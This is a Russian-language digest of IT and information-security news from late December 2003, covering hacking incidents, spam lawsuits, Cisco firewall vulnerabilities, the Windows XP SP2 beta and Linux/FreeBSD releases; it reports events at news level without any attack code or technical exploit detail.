Сегодня ночью неизвестные хакеры успешно атаковали сервер, на котором расположен сайт "Чеченпресс", являющийся рупором лидера чеченских боевиков Аслана Масхадова. По состоянию на момент публикации данного сообщения сайт "Чеченпресс" недоступен для посетителей. Сайт чеченских экстремистов "Кавказ Центр" сообщает, что в скором времени "Чеченпресс" возобновит работу. При этом не уточняется, причастны ли к данной хакерской атаке спецслужбы России. Источник - http://www.securitylab.ru
25/12/2003 19:02 Российским банкам угрожают собственные сотрудники.
Главной проблемой для информационных систем российских банков являются не внешние атаки, а собственный персонал. Действия неквалифицированных специалистов часто становятся причиной тяжелых последствий. Как сообщил агентству "Интерфакс" заместитель начальника главного управления безопасности и защиты информации ЦБ РФ Андрей Курило, основным риском, которому подвержены кредитные организации, является заражение информационных систем компьютерными вирусами. Другой опасностью выступают атаки из Интернета. "Но самые серьезные риски исходят, к сожалению, от собственного персонала. Вред могут нанести и неквалифицированные программисты, и люди, которые, даже не подозревая об этом, сами заносят в банк вирус, принеся зараженную дискету. Основная опасность заключается в том, что персонал знает технологию изнутри", - считает представитель Банка России. Очень часто внешняя атака становится результативной в том случае, если у злоумышленников есть сообщник внутри кредитной организации. "Все известные нам инциденты безопасности были связаны именно с этим", - подчеркнул Андрей Курило. Источник - http://www.interfax.ru/
25/12/2003 18:24 Правительство России объявляет войну "военным крышам" пиратов.
Правительство России, наконец, обратило внимание на проблему производства пиратских дисков на территориях предприятий отечественного военно-промышленного комплекса. Во вторник премьер-министр РФ Михаил Касьянов на заседании комиссии правительства по противодействию нарушениям прав интеллектуальной собственности пообещал, что исполнительная власть предпримет все необходимые меры для пресечения производства контрафактной продукции в российской оборонке. "Уже отмечалось, что есть случаи, когда закрытые предприятия ВПК предоставляют свои площади для этих целей коммерческим структурам, и это - чрезвычайно неприятные факты", - отметил М.Касьянов. Он добавил, что "прекратить это является обязанностью власти, это влияет на имидж страны". Напомним, что сигналы о производстве пиратских дисков под прикрытием российской оборонки поступали с Запада уже давно. В середине лета посол США в России Александр Вершбоу направил письмо в Минпечати РФ, в котором он просил российское правительство обратить внимание на производство пиратских дисков на территории ВПК и принять соответствующие меры. Подробности - http://www.interfax.ru/r/B/themeday2/32.html?id_issue=8174479
25/12/2003 17:50 Мобильный спам пришел в Россию.
В России зафиксированы первые серьезные случаи рассылки мобильного спама - непрошеных сообщений, приходящих на мобильные телефоны. В минувшие выходные спамеры атаковали абонентов уральского филиала "Мегафона", а в начале месяца рекламные SMS-объявления были разосланы абонентам уральского филиала МТС. По данным газеты «КоммерсантЪ», в обоих случаях спамеры взламывали интернет-сайты операторов и рассылали через них нелегальные объявления и SMS-агитки. Если сотовые компании не примут срочных мер, уже в следующем году российские сети может захлестнуть волна паразитарных SMS-рассылок. Борцы со спамом предостерегают, что ситуация с паразитарными SMS-рассылками со временем может достичь масштабов почти такого же бедствия, как и с обычным спамом в интернете. Компания Postini, которая фильтрует более 130 млн. электронных сообщений в день, для таких крупных провайдеров в США, как AOL, на своем сайте postini.com дает следующую статистику: в обычный день 2003 года 74 млн. сообщений из 130 млн. являются спамерской рассылкой. По словам Игоря Ашманова, уже сегодня известны три способа рассылки мобильного спама. Первый и самый очевидный способ – это взлом SMS-гейтов (что и произошло в Екатеринбурге) операторов в интернете. Компании защищают их специальными фильтрами, но спамерские технологии совершенствуются, позволяя обойти или взломать защиту. Во-вторых, возможна рассылка SMS вручную, с мобильного телефона. Последний способ, конечно, сопряжен с большим риском (ведь тогда определится номер конкретного спамера), да и, кроме того, исходящие SMS-сообщения стоят денег. Наконец, третий вид рассылок – сообщения самих операторов, рекламирующих свои услуги. Последние, впрочем, спамом это не считают. Подробнее - http://www.cnews.ru/newtop/index.shtml?2003/12/23/153323
25/12/2003 17:38 Symantec отсудила у спамеров 3 миллиона долларов.
Согласно viruslist.com, производители программного обеспечения Norton Antivirus и System Works сумели добиться судебного вердикта, по условиям которого спамерская компания Maryland Internet Marketing (MIM) выплатит им 3 миллиона долларов, сообщает CNET. Вынесение подобного вердикта стало возможным после того, как федеральный суд признал MIM виновной в распространении контрафактных копий Norton Antivirus и System Works. Кроме того, производителям Norton Antivirus, компании Symantec, удалось добиться постановления, по которому глава MIM Джордж Мур (George Moore) персонально выплатит компенсацию в размере 300 тысяч долларов и лишится в будущем возможности продавать неавторизованные копии программ компании. По словам директора Symantec по глобальной безопасности и защите бренда, произнесенным им после вынесения вердикта, MIM являлась главным источником спама с предложениями о продаже пиратских копий Norton Antivirus и System Works. "Результатом этого процесса стало резкое снижение количества подобных писем и исчезновение с рынка большого количества контрафактной продукции", - прокомментировал представитель Symantec решение суда. Судебный иск против MIM Symantec подала в апреле. В течение осени производителям антивирусов уже удалось выиграть подобные дела у двух других рассыльщиков спама: CD Micro и eCommerce. Сумма компенсаций, которые должна выплатить CD Micro и ее руководитель, составляет 10 миллионов долларов. Подробности - http://www.avnonline.com/issues/200312/newsarchive/news_122303_7.shtml
25/12/2003 17:13 Что планируется сделать в FreeBSD 5.3.
Как сообщается на linux.org.ru, Scott Long - член команды FreeBSD Release Engineering, описал задачи, стоящие перед разработчиками ветки 5.3. Планируется существенно увеличить скорость работы подсистемы обработки прерываний за счет архитектурно-зависимой оптимизации. Возможно будет добавлена поддержка новой архитектуры прерываний - (message-signaled interrupt, MSI) для приложений, работающих в режиме реального времени и вырабатывающих большое количество запросов на прерывание. Релиз планируется выпустить в конце апреля, начале мая 2004 г. Подробнее - http://www.bsdforums.org/forums/showthread.php?threadid=17255
25/12/2003 16:52 Как доброта в чате подвела хакера.
25-летний Дэниел Баас признал себя виновным во взламывании и незаконном копировании гигантских баз данных фирмы, где он работал. Дэниел признал себя виновным в превышении служебных прав доступа на защищенный компьютер. Он использования его для проникновения в главный сервер корпорации Acxiom - компании, известной среди защитников секретности как крупнейший аналитик закрытой информации о потребителях. Компания специализируется на анализе потребительских данных для многочисленных компаний, ведущих клиентские базы данных. С октября 2000 года до июня сего года, Баас работал администратором системы в фирме, выполняющей работы для Acxiom. В рамках работы он имел законный доступ к серверу Acxiom FTP. В недрах системы, при работе с сервером, он и нашел незащищенный файл, содержащий зашифрованные пароли других пользователей. Один из этих паролей и дал Дэниелу доступ ко всем счетам, используемым клиентами Acxiom - даннные кредитной карточки, банки, счета, телефоны и другие конфиденциальные данные. Он скопировал и записал базу на компакт-диски. Баас скачал данные о более чем миллионе клиентов. Он не совершил никакого мошенничества или злоупотребления полученными данными, видимо тут просто возобладала страсть к собиранию информации. Acxiom никогда бы не обнаружила деятельность Бааса, если бы в одной из IRC комнат для дискуссий в апреле этого года, Баас не помог мельком знакомому по сети товарищу узнать данные местного агента ФБР. Подробности - http://www.networkdoc.ru/news/archives/00000402.html
25/12/2003 16:37 SCO открывает новый фронт в Linux-войне.
SCO Group взяла под прицел новую группу пользователей Linux, пытаясь извлечь доход из якобы незаконного использования в Linux интеллектуальной собственности Unix, однако Novell, бывший владелец операционной системы, утверждает, что авторские права все еще принадлежат ей. На прошлой неделе SCO приступила к рассылке первой очереди писем примерно 3000 компаний, университетов и других организаций, лицензировавших Unix, как правило, у AT&T — компании, которая создала и много лет продавала эту операционную систему. Прежний кавалерийский набег SCO ограничивался кругом крупнейших в мире компаний. В письме SCO требует, чтобы лицензиаты в 30-дневный срок подтвердили, что их сотрудники и партнеры не предпринимали ни одного из восьми указанных действий в отношении Linux. Если лицензиат не пришлет такого подтверждения, «SCO может применить к нему все доступные ей юридические меры», включая прекращение действия лицензии. «Мы намерены также сделать это сферой приложения наших принудительных инициатив», — сказал во время телеконференции в понедельник генеральный директор SCO Дарл Макбрайд. Однако в лицензионных соглашениях прописаны лишь ограниченные аудиторские полномочия, и у SCO могут возникнуть проблемы с получением всей информации, которую она требует, кроме таких простейших данных, как число компьютеров и процессоров, исполняющих Unix. Подробности - http://www.zdnet.ru/?ID=311690
25/12/2003 15:34 Арест Саддама Хусейна спровоцировал киберпротивников США.
Арест Саддама Хусейна спровоцировал значительный рост хакерских атак против сетей и систем, расположенных в США. К такому выводу пришли специалисты исследовательского отдела британской компании Mi2G Ltd., занимающейся вопросами компьютерной безопасности, сообщает сайт газеты The Globe And Mail. По результатам исследований, декабрь стал самым тяжелым месяцем уходящего года для американских пользователей. Общее число удачно проведенных и доступных для независимых экспертов атак уже превысило 5383. Для сравнения - семь других наиболее привлекательных для хакеров стран в совокупности были атакованы 5172 раза. При этом 1529 атак пришлось на долю Германии, 1513 - Бразилии, 604 - Италии, 501 - Польши, 411 - России, 331 - Канады и 283 - Швейцарии. Столь значительный разрыв в числе атак на США и другие страны - недавно зародившаяся тенденция, отмечают в Mi2G. Резкое увеличение числа киберпреступлений против американских сетей и серверов началось после 13 декабря, дня, когда был арестован бывший президент Ирака. Одновременно снизилось число хакерских атак на европейские страны. Основным источником нападений хакеров стали Марокко, Турция, Кувейт, Индонезия, Пакистан, Бразилия и Мексика. При этом отмечен рост политических заявлений, публикуемых во время кибернападений. Главным образом, подобные заявления идут от хакеров, стремящихся добиться снижения влияния США на Ближнем Востоке. Источник - http://www.viruslist.com
24/12/2003 21:39 "Электронное правительство" не заработает, пока всех россиян не обеспечат Интернетом.
Реализация в России федеральной программы "Электронное правительство" не может быть полномасштабной, пока на будет решена проблема обеспечения большинства населения доступом к Интернету. Об этом, как передает РИА "Новости", заявил в среду начальник Управления по координации Федеральной целевой программы (ФЦП) "Электронная Россия" Минсвязи РФ Олег Бяхов. Как заявил Бяхов, в настоящее время 40 процентов населения России имеют доступ к Интернету, две трети никогда им не пользовались. Он отметил, что больше половины из имеющих доступ могут пользоваться Интернетом на работе, и лишь 27 процентов - и дома, и на работе. "Это достаточно критичный фактор", - подчеркнул Бяхов. "Дальше это станет еще большим препятствием для развития ФЦП "Электронная Россия", а также таких технологий, как телемедицина, которая особенно востребована в малых городах и в сельской местности", - заявил Бяхов. Подробности - http://www.lenta.ru/internet/2003/12/24/erussia/
23/12/2003 17:26 Защита от спама от "Лаборатории Касперского".
"Лаборатория Касперского", приглашает к сотрудничеству всех желающих принять участие в программе бета-тестирования передовой разработки компании - Kaspersky® Anti-Spam Personal. Kaspersky Anti-Spam Personal предназначен для фильтрации входящей электронной почты на предмет несанкционированной корреспонденции на персональном компьютере, работающем под управлением операционной системы Windows. Пакет Kaspersky Anti-Spam Personal представляет собой встраиваемый модуль для популярных почтовых клиентов Microsoft Outlook 2000 (2002) и Microsoft Outlook Express. В наибольшей степени функциональные возможности пакета реализуются при работе с Microsoft Outlook 2000 (2002), в то время как для изначально встроенного в операционные системы семейства Windows почтового клиента Microsoft Outlook Express доступна достаточная для большинства случаев базовая функциональность. Запускаясь одновременно с указанными почтовыми системами, Kaspersky Anti-Spam Personal производит многоуровневую фильтрацию входящей почты на основе формальных атрибутов писем, а также при помощи технологии лингвистического анализа, позволяющей системе самостоятельно анализировать текст письма, понять его смысл и отсеять нежелательную корреспонденцию. Если есть желающие нахаляву помочь "Лаборатории" - ссылка внизу. А потом они вам, возможно, предоставят бесплатно свой продукт (если будете ОЧЕНЬ активны). Ссылка - http://www.kaspersky.ru/news.html?id=144707340
23/12/2003 16:23 Спамеры заплатят Symantec 3 миллиона долларов.
Софтверная компания Symantec выиграла суд против фирмы из Балтимора, которая продавала фальшивое ПО через нежелательные коммерческие рассылки. Американская Фемида обязала Maryland Internet Marketing выплатить штраф, суммой $ 3000000. В это же время, президент нечистых на руку маркетологов Джордж Мур должен раскошелиться на 300 тысяч долларов. Помимо этого, суд запретил г-ну Муру и его компании использовать спам для продажи продуктов Symantec, независимо от того настоящие они или поддельные. А чтобы урок запомнился навсегда, фирма Maryland Internet Marketing должна будет оказать истцу посильную помощь в отслеживании других пиратов программного обеспечения, - сообщает The Inquirer . Источник - http://www.runet.ru
23/12/2003 15:12 В Швеции намерены запретить спам.
Правительство Швеции представило на рассмотрение Риксдага законопроект, запрещающий массовую рассылку не желаемой адресатом рекламы и спама по электронной почте и мобильным телефонам в виде сообщений SMS. Об этом сообщают сегодня ведущие СМИ Швеции. Наказанием за нарушение закона, который, как предполагается, вступит в силу 1 апреля 2004 года, может стать штраф в размере до 5 миллионов крон (около 650 тыс. долларов). Законопроект основан на директиве Евросоюза о координации законодательства стран ЕС. В большинстве европейских стран рассылка электронной рекламы без предварительного согласия адресата запрещена уже несколько лет. Подробности - http://www.rosbalt.ru/2003/12/06/133332.html
23/12/2003 14:43 SCO рассылает новые предупреждения пользователям Linux.
SCO Group в начале этой недели разослала несколько тысяч предупреждений компаниям, на чьих компьютерах установлена операционная система Linux, с предложениями как можно скорее приобрести лицензии на ОС. Фирма SCO, напомним, продолжает настаивать, что в ядрах Linux версий 2.4 и выше содержатся фрагменты исходного года Unix System V, якобы незаконно открытые корпорацией IBM. На этом основании SCO требует от IBM выплаты трехмиллиардной компенсации, пользователям Linux, в свою очередь, предлагается выплатить лицензионные отчисления, дабы избежать ненужных разбирательств в суде. Впервые письма с уведомлениями были отправлены еще в мае - тогда в качестве "мишеней" SCO выбрала около полутора тысяч крупнейших корпораций. Позднее появилась информация, что некоторые пользователи согласились на условия SCO и перечислили на счет этой фирмы требуемую сумму. Теперь инициаторы конфликта решили повторить попытку: на этот раз предупреждения получили 6000 компаний, более 40 из которых входят в список Fortune 100. В качестве решения проблемы в SCO предлагают три возможных варианта - а именно, немедленно прекратить использование Linux, выплатить полагающиеся отчисления или же предстать перед судом. Подробности - http://www.compulenta.ru/2003/12/23/44125/
23/12/2003 12:11 Сравнение дистрибутивов Linux: Fedora 1 vs. SuSE 9.0
Неблагодарное это дело - сравнивать различные дистрибутивы, тем более, можно навлечь а себя гнев ярых почитателей сравниваемых дистрибуций. Тем не менее, как сообщает linux.org.ru, американский преподаватель Ken Barber опубликовал сравнительную статью, где рассматривались два дистрибутива Linux: Fedora 1 и SuSE 9.0. У каждого дистрибутива оказались свои достоинства и недостатки. Так, например, Fedora работает гораздо быстрее на машинах, слабее чем P3-600MHz, а в SuSE есть замечательная утилита YaST, которая, по словам автора, позволяет настроить в системе абсолютно всё: "YaST - это всё, что нужно системному администратору". Оба дистрибутива оказались на должном уровне защищены, однако SuSE позволяет более гибче настроить файрволл, не прибегая к написанию собственных скриптов. Огорчила неудовлетворительная поддержка MP3 в Fedora. Прим. ньюсмейкера: Признаться, меня тоже несколько расстроил тот факт, что, начиная с версии RedHat 9.0 убрана поддержка MP3 (якобы, по лицензионным соображениям). Подробности - http://www.newsforge.com/os/03/12/18/137237.shtml?tid=2&tid=82&tid=94
23/12/2003 11:44 Американский хакер лишил IT-компанию 5,8 миллиона долларов.
Как сообщает viruslist.com, 25-летний житель американского города Милфорд, штат Огайо, признал себя виновным в хищении данных из базы IT-компании Acxiom Corp. Согласно решению суда, до вынесения приговора приблизительно в течение двух месяцев обвиняемый Дэниэл Баас (Daniel J. Baas) будет находиться под стражей без права освобождения под залог. Свое признание Баас сделал в рамках соглашения с федеральными прокурорами. Хищение баз данных Acxiom Corp. 25-летний американец совершил между январем 2001 и 2003 года. Украденные сведения он хранил на домашнем компьютере и никому их не передавал. По словам следователей, в распоряжение Бааса попали личные сведения о клиентах компании. "Это человек, которому нравится собирать сведения о людях", - пояснил помощник прокурора. Совершая кражу 300 паролей из базы данных Acxiom, Баас руководствовался исключительно любопытством. Однако это обстоятельство не снимает с него ответственности за нарушение закона, запрещающего несанкционированный доступ к компьютерам, отметил адвокат обвиняемого. Подробности - http://seattlepi.nwsource.com/business/aptech_story.asp?...
22/12/2003 20:49 «Конфидент»: три новых лицензии ФСБ по криптографической защите.
ООО «Конфидент» к уже имеющейся лицензии ФСБ № 1156 на осуществление работ с использованием сведений, составляющих государственную тайну, получила три новые лицензии ФСБ, расширяющие возможности компании при реализации проектов связанных с криптографической защитой информации. Лицензии ФСБ РФ №№ 196 П, 197 Х, 198 Р от 5 ноября 2003 г. подтверждают право ООО «Конфидент» осуществлять разработку, производство шифровальных (криптографических) средств, защищённых с использованием шифровальных (криптографических) средств информационных и телекоммуникационных систем, а также техническое обслуживание и распространение шифровальных (криптографических) средств. Лицензии действительны до 5.11.2008 года. Источник - http://www.oxpaha.ru
22/12/2003 20:27 Отчёт о вирусной активности прошедшей недели.
Опубликован традиционный, еженедельный отчёт о вирусах компании Panda Software. В отчёте рассматриваются три версии "B" троянов: Sober, Wincap и Duster. Более подробно - http://www.viruslab.ru/press/index.php?go=show&num=224
22/12/2003 20:04 Бразильские хакеры атаковали 13 сайтов НАСА.
Согласно viruslist.com, 13 веб-сайтов Национального управления США по аэронавтике и исследованию космического пространства (НАСА) подверглись 17 декабря хакерской атаке. Согласно данным двух независимых организаций, отслеживающих хакерскую активность, организаторами кибернападения являются жители Бразилии, протестующие таким образом против войны в Ираке. К выводам о причастности бразильцев к хакерской атаке на сайты НАСА пришли специалисты компании Mi2G Ltd., расположенной в Лондоне, и контролирующей хакерскую активность организации Zone-H. При этом сайт Zone-H также был выведен из строя. Установить связь этого события с атакой на сайты НАСА пока не удалось. Часть атакованных серверов НАСА принадлежит Программе компьютерных, информационных и коммуникационных технологий (CICT), подразделению суперкомпьютеров и сети исследований и образования (NREN). В то же время главный сайт управления - www.nasa.gov - оказался в безопасности. Атакованные веб-ресурсы работали в операционной среде Unix и использовали программное обеспечение Apache. На атакованных страницах хакеры из объединения DRWXR оставили антивоенные надписи и разместили видеозапись, на которой американские солдаты убивают иракца. Подробности - http://www.gcn.com/vol1_no1/daily-updates/24475-1.html
22/12/2003 19:51 Создатель DeCSS полностью оправдан.
Йон Йохансен, в 15-летнем возрасте взломавший систему защиты от копирования DVD, выиграл судебный процесс против заокеанской киноиндустрии. По информации агентства Reuters, апелляционный суд города Осло (Норвегия) полностью оправдал Йона Йохансена, обвинявшегося Ассоциацией кинематографистов США (MPAA) в краже интеллектуальной собственности, выразившейся в создании программного средства для взлома системы защиты от копирования DVD-дисков. По мнению суда, в действиях Йохансена отсутствует состав преступления. Адвокаты MPAA подали заявление в апелляционный суд после того, как суд первичной инстанции оправдал Йохансена, заявив, что он имел полное право делать все что угодно с легально приобретенными DVD-носителями. Кроме того, в ходе первого разбирательства суд решил, что представителям MPAA и государственному обвинению не удалось предъявить достаточных доказательств того, что программа DeCSS действительно использовалась для несанкционированного взлома и копирования DVD-дисков. Теперь, если MPAA захочет довести дело до его логического завершения, адвокатам Ассоциации придется подавать еще одну апелляцию: на этот раз – в Верховный суд Норвегии. Пока не известно, станут ли они испытывать судьбу в третий раз. Источник - http://www.internet.ru
22/12/2003 19:33 Мировой рынок систем безопасности.
Согласно данным, приведенным аналитиками IDC в отчете Worldwide Quarterly Security Appliance Server Tracker, объем глобального рынка серверных устройств обеспечения безопасности достиг в третьем квартале 2003 года 379,1 млн. долл., что на 22% больше полученных в том же квартале 2002 года результатов. При этом наибольший объем продаж в 317,7 млн. долл. пришелся на межсетевые экраны и устройства формирования виртуальных частных сетей. А наиболее высокие темпы роста, 89%, продемонстрировали системы распознавания внешних вторжений. Несмотря на некоторое снижение продаж по сравнению с прошедшим годом, США продолжает лидировать, обладая 45,3% мировых продаж. В Европе, Японии и ряде других регионах рост рынка характеризуется двузначными цифрами. Лидером данного сегмента рынка стала компания Cisco Systems с объемом продаж в 133,2 млн. долл. Ей принадлежит 35% рынка. Далее следуют Netscreen (57,41 млн., 15%), Nokia (42,52 млн., 11%), SonicWALL (19,87 млн., 5%), WatchGuard (12,64, 3%). Следует отметить, что продажи Cisco и Netscreen возросли по сравнению с третьим кварталом прошлого года на 12 и 91%, в то время как у остальных членов первой пятерки - снизились от 7 до 12%. Источник - http://www.osp.ru
22/12/2003 16:19 Создание мультизагрузочного CD с мини-версиями Linux и FreeBSD.
На сайте opennet.ru опубликована довольно полезная статья Максима Чиркова, в которой описан процесс создания мультизагрузочного компакт-диск, который содержит 2 операционные системы - Linux (на примере дистрибутива BBC) и FreeBSD (на примере лайв-дистрибутива Frenzy). В зависимости от задач можно грузить или один, или второй дистрибутив. На opennet.ru также выложены ISO-образы обоих дистрибутивов. Статья - http://www.opennet.ru/base/sys/multy_boot_cd.txt.html
22/12/2003 15:52 Бета-версия SP2 для Windows XP готова к загрузке.
Microsoft выпустила тестовую версию второго крупного обновления операционной системы Windows XP. Service Pack 2 for Windows XP доступен для загрузки через веб-сайт Microsoft для зарегистрированных бета-тестеров BetaPlace. Ожидается, что позднее Microsoft предложит его и в разделе download своего сайта для разработчиков MSDN и на CD. Как уже сообщалось, внесенные в SP2 изменения сфокусированы на безопасности. Обновление содержит переработанный компонент межсетевого экрана, который теперь называется Windows Firewall и включен по умолчанию, защищая ПК от внешних атак. Кроме того, в SP2 по умолчанию выключен сервис Windows Messenger. Этот сервис, предназначенный главным образом для того, чтобы системный персонал мог посылать административные сообщения по сети, освоили спамеры — как средство доставки непрошеной всплывающей рекламы. Обновление коснулось и веб-браузера Internet Explorer, в котором заблокирована поддержка всплывающих рекламных окон на веб-сайтах и запрещена несанкционированная загрузка ПО. Сервисный пакет содержит ряд поправок, нацеленных на предотвращение возможности использования ошибок «переполнения буфера», приобретающего все большую популярность у хакеров средства организации дистанционных атак на ПК. В SP2 расширена поддержка беспроводных сетей и действующих на коротком расстоянии радиосоединений Bluetooth, а также новой версии графической библиотеки Microsoft DirectX. Подробнее - http://news.zdnet.co.uk/software/windows/0,39020396,39118684,00.htm
22/12/2003 15:23 Cisco предупреждает о дырах в системах PIX firewall.
Компания Cisco предупреждает своих клиентов о проблемах с безопасностью в своих продуктах PIX firewall и программных межсетевых экранах, работающих с коммутаторами Catalyst 6500 Series и 7600 Series. На сайте корпорации опубликованы две рекомендации, в которых описаны уязвимые точки, позволяющие взломщикам дистанционно с помощью HTTP- и SNMP-запросов отключать защиту межсетевых экранов Cisco. В некоторых версиях PIX firewall может инициироваться зависание или перезапуск с использованием атак, вызывающих отказ в обслуживании (DoS), на базе посылки сообщений третьей версии протокола SNMP (SNMPv3). Cisco напоминает, что PIX firewall не поддерживает SNMPv3. Коммутаторы Catalyst, в которых используются модули FWSM (Firewall Services Module), также уязвимы для DoS-атак с использованием SNMPv3. FWSM представляет собой ПО, базирующееся на операционной системе PIX, которое позволяет наделять высокопроизводительные коммутаторы Catalyst функцией межсетевого экрана. В FWSM обнаружена еще одна уязвимая точка, связанная с переполнением буфера. Она может позволить хакерам инициировать зависание межсетевых экранов с помощью запросов по протоколам RADIUS или TACACS+. Системы Pix firewall, работающие с ПО версий 6.3.1, 6.2.2, 6.1.4, 5.x.x и более ранними версиями, уязвимы для атаки через SNMPv3, то же самое касается и коммутаторов Catalyst 6500 и Catalyst 7600, на которых запущенно ПО FWSM вплоть до версии 1.1.2. Для исправления проблемы Cisco предлагает бесплатное обновление ПО. Источник - http://www.cnews.ru
22/12/2003 14:35 "Лаборатория Касперского" представляет новую технологию обновления антивирусных баз.
Как сообщается в информационном листке "Лаборатории Касперского", компания представила пользователям свою новую технологию обновления антивирусных баз данных под названием Rapid Virus Response, способную, согласно заявлению компании, существенно повысить уровень защиты от новых вирусных эпидемий. Пользователи смогут автоматически загружать через Интернет и подключать свежие обновления антивирусной базы данных каждые три часа (!). Согласно новому регламенту выпуска регулярных обновлений лечащие модули, содержащие процедуры защиты оn новых вирусов, будут доступны для загрузки в автоматическом режиме либо по запросу пользователя в полночь и далее в 3, 6, 9, 12, 15, 18 и 21 час. "Лаборатория Касперского" проводит предварительное комплексное тестирование обновлений для исключения появления ложных срабатываний на заведомо безопасных данных и обеспечения максимальной совместимости с программным и аппаратным обеспечением. Тестирование производится на пуле испытательных серверов high-end класса, более чем 100-гигабайтном массиве данных и гарантирует бесперебойную работу обновлений на всех популярных платформах и приложениях. Наряду с регулярными обновлениями технология Rapid Virus Response также обеспечивает пользователей и специальными внеочередными дополнениями базы данных Антивируса Касперского. Этот вид обновлений обеспечивает молниеносную реакцию на новые вирусные эпидемии, имеющие глобальный характер: защита против вредоносных программ выпускается в течение всего 30 минут после обнаружения вспышки вирусной активности. Источник - http://www.kaspersky.ru
21/12/2003 17:14 Выход Mac OS X Server 10.3.2.
Компания Apple выпустила патчи (связанные с безопасностью) для операционных систем Mac OS X 10.3.2 и 10.2.8, а также Mac OS X Server 10.3.2. Из изменений в серверной ОС: улучшенная поддержка Kerberos для AFP-сервисов, обновлены/улучшены приложения Server Admin и Workgroup Manager, Network Image Utility и QTSS Publisher, улучшена интеграция с Active Directory, версия MySQL обновлена до 4.0.16. Источник - http://www.nixp.ru
21/12/2003 16:29 Пользователей развели на «диалапе».
Австралийские серферы, использующие модемное соединение с Интернетом через местные телефонные линии, стали жертвами международной аферы. Сумма ущерба составляет тысячи долларов. Омбудсмен Телекоммуникационной Индустрии (ОТИ) предупредил об опасности случайного «вываливания» из Сети. Мошенническая уловка получила название «интернет дампинг». Схема действия обмана такова. В процессе веб-серфинга происходит разрыв связи с местным ISP. Когда соединение восстанавливается, то пользователь автоматически подключается к заграничным провайдерам, у которых очень высокие расценки на услуги. С октября Омбудсмен получил 731 жалобу в отношении спорной оплаты международных дозвонов. В некоторых случаях, клиентам приходили счета в 3500 долларов за один звонок. Представитель ОТИ Ребекка Фредерикс заявила, что подключение к зарубежным провайдерам практикуется при посещении определенных веб-ресурсов, в особенности порнографических. При этом иногда пользователи получают счета за звонки, которые были сделаны, когда их не было дома. Дело в том, что специальное программное обеспечение позволяет задать модему определенный интервал дозвона по иностранному номеру. Источник - http://www.runet.ru
21/12/2003 16:05 О том, как перейти на ядро 2.6.0 в Fedora Core.
На бельгийском сайте freax.be опубликована довольно полезная статья, написаннная Kristof Vansant, которая посвящена "прикручиванию" ядра 2.6-test в дистрибутиве Fedora Core 1, который недавно выпущен компанией Red Hat Inc. Сам процесс, описанный в статье, довольно успешно можно использовать для перехода на стабильное ядро 2.6.0, выпущенное на этой неделе Линус & Co. Нюансы имеются и касаются они, в частности, появления в ядре 2.6.0 новой файловой системы sysfs, а также механизма работы модулей, которые теперь компилируются в другом формате и прописываются в файле /etc/modprobe.conf (в 2.4 - /etc/modules.conf). Кроме того, работа ATAPI CDROM теперь осуществляется не через эмуляцию ide-scsi. Имеются также нюансы в работе звуковой системы - в состав 2.6.0 включён набор драйверов ALSA, хотя при конфигурировании можно выбрать и традиционную OSS. Также хотелось бы привести второй URL, который ссылается на неплохую статью студента Массачусетского технологического института (MIT) Thomer M. Gil, которая также посвящена процессу перехода на ядро 2.6. Статья 1 - http://www.freax.be/wiki/index.php/Fedora... Вторая статья - http://thomer.com/linux/migrate-to-2.6.html
21/12/2003 15:41 Офицальная поддержка криптопроцессоров Hifn.
По сообщению linux.org.ru, компания Hifn Inc. - известный производитель оборудования для network security, анонсировала новые модели криптопроцессоров и объявила о официальной поддержке FreeBSD. Об этом сообщил Tom Moore, коммерческий директор Hifn, Inc. Подробности - http://www.hifn.com/info/pr/pressreleases/print/pr_121603_2.html
20/12/2003 20:01 "Руссобит-софт" обвинили в пиратстве.
Ряд зарубежных компаний, в том числе такие гиганты развлекательной индустрии, как EMI, Sony Music и Warner Music, подал иск против российской фирмы "Руссобит-софт" по обвинению в пиратском производстве компакт-дисков. От "Руссобит-софта" требуют выплаты компенсации в размере $1,3 млн. за "незаконный выпуск дисков исполнителей, права на тиражирование творчества которых принадлежат западным компаниям". Источник - http://www.cnews.ru
20/12/2003 19:47 Кевин Митник напишет ещё одну книгу.
Самый известный хакер Кевин Митник приступил к написанию второй своей книги. Напомним, что первая его книга называлась "Art of Deception" (Искусство маскировки) и пользовалась большим успехом у сетевой общественности. Рабочее название второй книги - "The Art of Intrusion" (Искусство вторжения?). Предполагается, что в книге будут приведены различные факты реальных взломов через сеть (и не только), естественно, со скрытием истинных имён "героев". В связи с написанием новой книги Кевин обратился с призывом к бывшим хакерам присылать ему различные правдивые истории, поообщев приз в $500 за самую интересную историю и $200 за каждую историю, которая будет включена в будущую книгу. Об этом поведал Интернет-издательству ZDNet Australia сам Кевин по телефону. Подробности - http://news.zdnet.co.uk/0,39020330,39118685,00.htm
20/12/2003 18:22 В Центробанке РФ построена устойчивая к сбоям система обработки информации.
Вчера состоялась презентация первого в России катастрофоуйстойчивого комплекса обрабтки информации. Комплекс был внедрен в Центральном банке РФ компаниями IBM, Cisco Systems, Атлантис Коммуникейшенз и ЕС-Лизинг при содействии специалистов Российской Академии Наук. Система, которая будет обрабатывать информацию Главного управления Банка России по Санкт-Петербургу, представляет собой два вычислительных комплекса, соединенных двумя независимыми оптоволоконными каналами. Комплекс построен на базе мэйнфреймов IBM eServer zSeries 900 и сетевого оборудования Cisco. Реализация катастрофоустойчивой системы вычислений предполагает наличие двух или более вычислительных комплексов, информация на которых дублируется. При выходе из строя одного из комплексов в результате аварии, стихийного бедствия или террористического акта, другие узлы системы продолжают работу. Надежность системы (показатель доступности системы для внедренного в ЦБ РФ комплекса составляет 99,99%) достигается за счет того, что серверы разнесены на расстояние 22 километра и связаны между собой двумя оптоволоконными каналами, проложенными по разным маршрутам. Немаловажную роль в надежности комплекса играет сетевое оборудование Cisco - примененная в сетевых устройствах технология DWDM (Dense Wavelength Division Multiplexing) позволяет увеличить пропускную способность одного канала передачи данных в 32 раза. Кроме того, эта технология не ограничивает расстояние между вычислительными комплексами - оно может достигать десятки тысяч километров Источник - http://www.compulenta.ru
20/12/2003 17:18 "История Linux" на CD.
